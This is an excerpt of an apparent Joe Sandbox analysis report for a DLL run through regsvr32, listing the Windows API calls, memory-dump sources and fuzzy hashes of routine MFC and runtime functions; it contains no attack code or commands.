                                                                                                          • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 10021092
                                                                                                          • GlobalLock.KERNEL32 ref: 1002109C
                                                                                                          • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 100210A9
                                                                                                          • ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 100210C1
                                                                                                            • Part of subcall function 1002A801: GlobalFlags.KERNEL32(?), ref: 1002A810
                                                                                                            • Part of subcall function 1002A801: GlobalUnlock.KERNEL32(?,?,?,?,10021A27,?,00000214,1000148F), ref: 1002A822
                                                                                                            • Part of subcall function 1002A801: GlobalFree.KERNEL32 ref: 1002A82D
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670087441.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670081674.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670121747.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670130141.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670135461.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670159582.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670165094.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670171210.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
                                                                                                          • String ID:
                                                                                                          • API String ID: 168474834-0
                                                                                                          • Opcode ID: 85f582fc0fa2d760b393ed167a5d421003042f2adcf672044b7dbfb8b9eda5cc
                                                                                                          • Instruction ID: 1e26f6493bbdf61cc617228eadb58d3a13350607a0778397bdab265459f41c03
                                                                                                          • Opcode Fuzzy Hash: 85f582fc0fa2d760b393ed167a5d421003042f2adcf672044b7dbfb8b9eda5cc
                                                                                                          • Instruction Fuzzy Hash: 6E11E079600640BBDB228BA5CD89DAFBAFDFB867407500529F605D2020DA72ED81DB64
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • GetSystemMetrics.USER32 ref: 1002A99D
                                                                                                          • GetSystemMetrics.USER32 ref: 1002A9A4
                                                                                                          • GetSystemMetrics.USER32 ref: 1002A9AB
                                                                                                          • GetSystemMetrics.USER32 ref: 1002A9B5
                                                                                                          • GetDC.USER32(00000000), ref: 1002A9BF
                                                                                                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 1002A9D0
                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 1002A9D8
                                                                                                          • ReleaseDC.USER32 ref: 1002A9E0
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670087441.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670081674.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670121747.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670130141.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670135461.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670159582.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670165094.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670171210.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MetricsSystem$CapsDevice$Release
                                                                                                          • String ID:
                                                                                                          • API String ID: 1151147025-0
                                                                                                          • Opcode ID: 97df97701bdba165d7bd0f3935d33a7940ab39bf43f5bcde9822dd001b09b376
                                                                                                          • Instruction ID: 4b18a5fc2a191a652713761d43d2b2da4b0cc28fbe92607e78cb1662e9ca01b2
                                                                                                          • Opcode Fuzzy Hash: 97df97701bdba165d7bd0f3935d33a7940ab39bf43f5bcde9822dd001b09b376
                                                                                                          • Instruction Fuzzy Hash: 0CF0F9B1E40724BAF7105F728C89B167EA8FB49761F004456E6199B281DAB599118FD0
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • GlobalLock.KERNEL32 ref: 1002B878
                                                                                                          • lstrlenA.KERNEL32(?), ref: 1002B8C3
                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 1002B8DD
                                                                                                          • _wcslen.LIBCMT ref: 1002B901
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670087441.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670081674.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670121747.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670130141.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670135461.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670159582.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670165094.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670171210.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ByteCharGlobalLockMultiWide_wcslenlstrlen
                                                                                                          • String ID: System
                                                                                                          • API String ID: 4253822919-3470857405
                                                                                                          • Opcode ID: d5816cacfd0a332e5282f5be394baf9a0c0f2a364455dc9baade1f500cebd3c2
                                                                                                          • Instruction ID: 7b5a175680f670ca79b6c2ec9272e95e82f354ff2106dbd97111df154043a3f4
                                                                                                          • Opcode Fuzzy Hash: d5816cacfd0a332e5282f5be394baf9a0c0f2a364455dc9baade1f500cebd3c2
                                                                                                          • Instruction Fuzzy Hash: C8412671D00619DFDB14CFA4DC85AAEBBB9FF04310F64812AE516EB285E770AD85CB50
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • GetParent.USER32(?), ref: 100270EF
                                                                                                          • PeekMessageA.USER32(00000024,00000000,00000000,00000000,00000000), ref: 10027113
                                                                                                          • UpdateWindow.USER32(?), ref: 1002712E
                                                                                                          • SendMessageA.USER32 ref: 1002714F
                                                                                                          • SendMessageA.USER32 ref: 10027167
                                                                                                          • UpdateWindow.USER32(?), ref: 100271AA
                                                                                                          • PeekMessageA.USER32(00000024,00000000,00000000,00000000,00000000), ref: 100271DB
                                                                                                            • Part of subcall function 1002A3F0: GetWindowLongA.USER32 ref: 1002A3FB
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670087441.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670081674.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670121747.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670130141.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670135461.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670159582.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670165094.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670171210.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Message$Window$PeekSendUpdate$LongParent
                                                                                                          • String ID:
                                                                                                          • API String ID: 2853195852-0
                                                                                                          • Opcode ID: 5e6b9223f0a1804046a8fbfe378e80d9714a9eacbb44f0fef3914e7058a9bdf9
                                                                                                          • Instruction ID: e439185c47b7e5e34c348b8e0b3dbe5bb3c4b57b45cec7e657144295835a6737
                                                                                                          • Opcode Fuzzy Hash: 5e6b9223f0a1804046a8fbfe378e80d9714a9eacbb44f0fef3914e7058a9bdf9
                                                                                                          • Instruction Fuzzy Hash: 9041C370E00246EBDB11CF69DC84E9FBBF8FF82B81F90815DE949A2150D7719A50DB10
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670087441.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670081674.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670121747.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670130141.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670135461.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670159582.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670165094.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670171210.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: LongWindow$MessageSend_memset
                                                                                                          • String ID: ,
                                                                                                          • API String ID: 2997958587-3772416878
                                                                                                          • Opcode ID: 1276ef7f4d5813a713450155f5ae2d4635a7a3024c65db1a6c5f2f6a990dd864
                                                                                                          • Instruction ID: f848ae84a4977e1a31b52bc52376e27e10e8709ed1b3efe9ee7841c93cdd6a05
                                                                                                          • Opcode Fuzzy Hash: 1276ef7f4d5813a713450155f5ae2d4635a7a3024c65db1a6c5f2f6a990dd864
                                                                                                          • Instruction Fuzzy Hash: 1431C134600B119FC715DF78E888A6AB7F5FF48350B92056DE58997691DB70E800CF94
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 10022468
                                                                                                          • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 1002254E
                                                                                                          • RegEnumKeyA.ADVAPI32(?,00000000,?,00000104), ref: 1002256B
                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 1002258B
                                                                                                          • RegQueryValueA.ADVAPI32(80000001,?,?,?), ref: 100225A6
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670087441.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670081674.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670121747.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670130141.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670135461.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670159582.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670165094.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670171210.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseEnumH_prolog3_OpenQueryValue
                                                                                                          • String ID: Software\
                                                                                                          • API String ID: 1666054129-964853688
                                                                                                          • Opcode ID: 3dcc581e61560c1b2a89a559af4b2aadf043690cbf44cd43855230fa8fe55520
                                                                                                          • Instruction ID: 3764a028f082780bf1b34d3e1a3aecc110f1b9c57831791e493d608046546682
                                                                                                          • Opcode Fuzzy Hash: 3dcc581e61560c1b2a89a559af4b2aadf043690cbf44cd43855230fa8fe55520
                                                                                                          • Instruction Fuzzy Hash: 3C41AC35800128EBCB22DBA0CC81AEEB3B8FF49310F5045D9F249E2191DB34AB958F94
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 100222EA
                                                                                                          • RegOpenKeyA.ADVAPI32(?,?,?), ref: 10022378
                                                                                                          • RegEnumKeyA.ADVAPI32(?,00000000,?,00000104), ref: 1002239B
                                                                                                            • Part of subcall function 1002228B: __EH_prolog3.LIBCMT ref: 10022292
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670087441.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670081674.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670121747.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670130141.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670135461.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670159582.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670165094.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670171210.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: EnumH_prolog3H_prolog3_catch_Open
                                                                                                          • String ID: Software\Classes\
                                                                                                          • API String ID: 3518408925-1121929649
                                                                                                          • Opcode ID: 148a9a07ce493e8523daa3725bf67091589f603dbf0392a59fe7285a5da600ad
                                                                                                          • Instruction ID: 704202dc6e21b2fa8b48efa6eea704b7fc6a1643c8ca87a9ade3220d51c06aab
                                                                                                          • Opcode Fuzzy Hash: 148a9a07ce493e8523daa3725bf67091589f603dbf0392a59fe7285a5da600ad
                                                                                                          • Instruction Fuzzy Hash: A1317C36C00068EBDB22EBA4CD44BDDB6B8FB09350F5141D5F999A3252DA306FA49F91
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • GetCapture.USER32 ref: 1002B279
                                                                                                          • SendMessageA.USER32 ref: 1002B294
                                                                                                          • GetFocus.USER32 ref: 1002B2A9
                                                                                                          • SendMessageA.USER32 ref: 1002B2B7
                                                                                                          • GetLastActivePopup.USER32(?), ref: 1002B2E0
                                                                                                          • SendMessageA.USER32 ref: 1002B2ED
                                                                                                            • Part of subcall function 1002881E: GetWindowLongA.USER32 ref: 10028844
                                                                                                            • Part of subcall function 1002881E: GetParent.USER32(?), ref: 10028852
                                                                                                          • SendMessageA.USER32 ref: 1002B313
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670087441.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670081674.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670121747.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670130141.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670135461.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670159582.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670165094.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670171210.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$ActiveCaptureFocusLastLongParentPopupWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 3338174999-0
                                                                                                          • Opcode ID: 8b045ddbd33b9174f1829eda3b456e63d99d5e6e5f6e5226114c782d6a6a23be
                                                                                                          • Instruction ID: 3a08670cfc868389e080b955865bcb0f045f405a5b874c30a2897e43bb08e3ed
                                                                                                          • Opcode Fuzzy Hash: 8b045ddbd33b9174f1829eda3b456e63d99d5e6e5f6e5226114c782d6a6a23be
                                                                                                          • Instruction Fuzzy Hash: 7F1146B590065AFFEB11DFA1DD8AC9E7E7CEF41788B910075F504A2121EB719F04AB20
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 1002AB28
                                                                                                          • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 1002AB4B
                                                                                                          • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 1002AB67
                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 1002AB77
                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 1002AB81
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670087441.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670081674.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670121747.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670130141.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670135461.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670159582.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670165094.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670171210.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseCreate$Open
                                                                                                          • String ID: software
                                                                                                          • API String ID: 1740278721-2010147023
                                                                                                          • Opcode ID: ccb9b6360ff57769a68f726ed1728c19480870e0bb9bbd8d9feb64ffad4441d4
                                                                                                          • Instruction ID: fb36ca9c2f952ecb3db15ddf6cda8d32fba402c4719dfc4725c3bd37d29a496b
                                                                                                          • Opcode Fuzzy Hash: ccb9b6360ff57769a68f726ed1728c19480870e0bb9bbd8d9feb64ffad4441d4
                                                                                                          • Instruction Fuzzy Hash: 6B11E672900158FBDB11DB9ADD88CDFBFBDEB8A750B5000AAF504A2122D7319E44DBA0
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 1002B013
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 1002B01D
                                                                                                            • Part of subcall function 100312CD: RaiseException.KERNEL32(?,?,1004B6B4,1004F1B8,?,?,?,100203CA,1004B6B4,1004F1B8,00000000,00000000), ref: 1003130F
                                                                                                          • LocalReAlloc.KERNEL32(?,00000000,00000002,00000000,00000010,?,?,00000000,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004), ref: 1002B034
                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4,00000004,10001461,00000000), ref: 1002B041
                                                                                                            • Part of subcall function 10023B23: __CxxThrowException@8.LIBCMT ref: 10023B39
                                                                                                          • _memset.LIBCMT ref: 1002B060
                                                                                                          • TlsSetValue.KERNEL32(?,00000000), ref: 1002B071
                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4,00000004,10001461,00000000), ref: 1002B092
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670087441.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670081674.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670121747.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670130141.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670135461.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670159582.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670165094.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670171210.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CriticalLeaveSection$Exception@8Throw$AllocExceptionLocalRaiseValue_memset
                                                                                                          • String ID:
                                                                                                          • API String ID: 356813703-0
                                                                                                          • Opcode ID: 57ffba166e203e5f771fa8df9200c34d4f09cabdb1cbb7fcc74f3b72e3f2cbe0
                                                                                                          • Instruction ID: 36d3102e2cb30bc4552268f57227952f3745dc8c02fd82b3b9104c669509b869
                                                                                                          • Opcode Fuzzy Hash: 57ffba166e203e5f771fa8df9200c34d4f09cabdb1cbb7fcc74f3b72e3f2cbe0
                                                                                                          • Instruction Fuzzy Hash: DC115E74100605AFD725EF64DCC5D2BBBB9FF453107A0C529F969D6522CB30AC24CB94
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • GetSysColor.USER32(0000000F), ref: 1002A956
                                                                                                          • GetSysColor.USER32(00000010), ref: 1002A95D
                                                                                                          • GetSysColor.USER32(00000014), ref: 1002A964
                                                                                                          • GetSysColor.USER32(00000012), ref: 1002A96B
                                                                                                          • GetSysColor.USER32(00000006), ref: 1002A972
                                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 1002A97F
                                                                                                          • GetSysColorBrush.USER32(00000006), ref: 1002A986
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670087441.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670081674.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670121747.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670130141.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670135461.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670159582.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670165094.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670171210.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Color$Brush
                                                                                                          • String ID:
                                                                                                          • API String ID: 2798902688-0
                                                                                                          • Opcode ID: 2aeb855fe3a01d91a1c159618acf838dda1bc2281205f0400994082937ea778a
                                                                                                          • Instruction ID: 2de359d209fd3f7b37bcce9053ec3ec9da3e309d31870537ed148616a4e248d0
                                                                                                          • Opcode Fuzzy Hash: 2aeb855fe3a01d91a1c159618acf838dda1bc2281205f0400994082937ea778a
                                                                                                          • Instruction Fuzzy Hash: 0BF0FE719407445BD730BF724E49B47BAD1FFC4710F02092EE2458B990D6B6E441DF44
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • __EH_prolog3_catch.LIBCMT ref: 1002326D
                                                                                                          • GlobalLock.KERNEL32 ref: 10023345
                                                                                                          • CreateDialogIndirectParamA.USER32(?,?,?,10022CA4,00000000), ref: 10023374
                                                                                                          • DestroyWindow.USER32(00000000,?,1000150C,00000000,2B815A64), ref: 100233EE
                                                                                                          • GlobalUnlock.KERNEL32(?,?,1000150C,00000000,2B815A64), ref: 100233FE
                                                                                                          • GlobalFree.KERNEL32 ref: 10023407
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670087441.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670081674.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670121747.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670130141.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670135461.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670159582.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670165094.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670171210.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Global$CreateDestroyDialogFreeH_prolog3_catchIndirectLockParamUnlockWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 3003189058-0
                                                                                                          • Opcode ID: 888fa3cfcf776247989f330621f25040a0e9d6be9df16a9d0be9406a16dfc2c2
                                                                                                          • Instruction ID: 542586d5134ef99c8f61472b69a72313b72e87743f096b2e8f632b75dff3f323
                                                                                                          • Opcode Fuzzy Hash: 888fa3cfcf776247989f330621f25040a0e9d6be9df16a9d0be9406a16dfc2c2
                                                                                                          • Instruction Fuzzy Hash: DD519B31A0024AEFCB04DFA4E9859AEBBB5EF04350F95442DF506E7292CB70AA45CB61
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • __CreateFrameInfo.LIBCMT ref: 10037760
                                                                                                            • Part of subcall function 10030430: __getptd.LIBCMT ref: 1003043E
                                                                                                            • Part of subcall function 10030430: __getptd.LIBCMT ref: 1003044C
                                                                                                          • __getptd.LIBCMT ref: 1003776A
                                                                                                            • Part of subcall function 10034770: __getptd_noexit.LIBCMT ref: 10034773
                                                                                                            • Part of subcall function 10034770: __amsg_exit.LIBCMT ref: 10034780
                                                                                                          • __getptd.LIBCMT ref: 10037778
                                                                                                          • __getptd.LIBCMT ref: 10037786
                                                                                                          • __getptd.LIBCMT ref: 10037791
                                                                                                          • _CallCatchBlock2.LIBCMT ref: 100377B7
                                                                                                            • Part of subcall function 100304D5: __CallSettingFrame@12.LIBCMT ref: 10030521
                                                                                                            • Part of subcall function 1003785E: __getptd.LIBCMT ref: 1003786D
                                                                                                            • Part of subcall function 1003785E: __getptd.LIBCMT ref: 1003787B
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670087441.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670081674.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670121747.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670130141.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670135461.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670159582.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670165094.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670171210.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                                          • String ID:
                                                                                                          • API String ID: 1602911419-0
                                                                                                          • Opcode ID: 46636e942f87dcca0c30cf7feca0092d3b0ea187b49415045ba274b669f62aa0
                                                                                                          • Instruction ID: fb1f34f9027f5a0fd6fb665b034cbc12c1ee6665b85233a2d450c333db5c1a8f
                                                                                                          • Opcode Fuzzy Hash: 46636e942f87dcca0c30cf7feca0092d3b0ea187b49415045ba274b669f62aa0
                                                                                                          • Instruction Fuzzy Hash: 4F1104B9C04249EFDB01DFA4D945AEE7BB1FF08315F508469F814AB251DB38AA11DF90
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670087441.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670081674.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670121747.0000000010047000.00000002.00020000.sdmp Download File
